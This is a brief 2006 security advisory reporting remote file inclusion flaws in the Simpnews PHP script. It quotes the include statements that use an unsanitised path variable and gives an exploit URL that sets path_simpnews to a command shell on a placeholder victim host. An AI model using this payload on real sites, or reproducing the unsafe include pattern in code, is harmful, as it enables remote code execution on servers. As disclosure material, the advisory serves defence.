Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:13164
HistoryJun 15, 2006 - 12:00 a.m.

Simpnews <= All version - Remote File Include Vulnerabilities

2006-06-1500:00:00
vulners.com
6

SaVSaK.CoM | SpC-x - The-BeKiR |

Simpnews <= All version - Remote File Include Vulnerabilities

Risk : High

Class: Remote

Script : Simpnews

Credits : SpC-x - The-BeKiR

Thanks : Ejder - FasTBoY - ERNE - RMx

Code :

require_once($path_simpnews.'/langchk.php');

include_once('./language/lang_'.$act_lang.'.php');

require_once('./includes/get_settings.inc');

require_once('./includes/wap_get_settings.inc');

Vulnerable :

http://www.victim.com/Simpnews/wap_short_news.php?path_simpnews=Command-Shell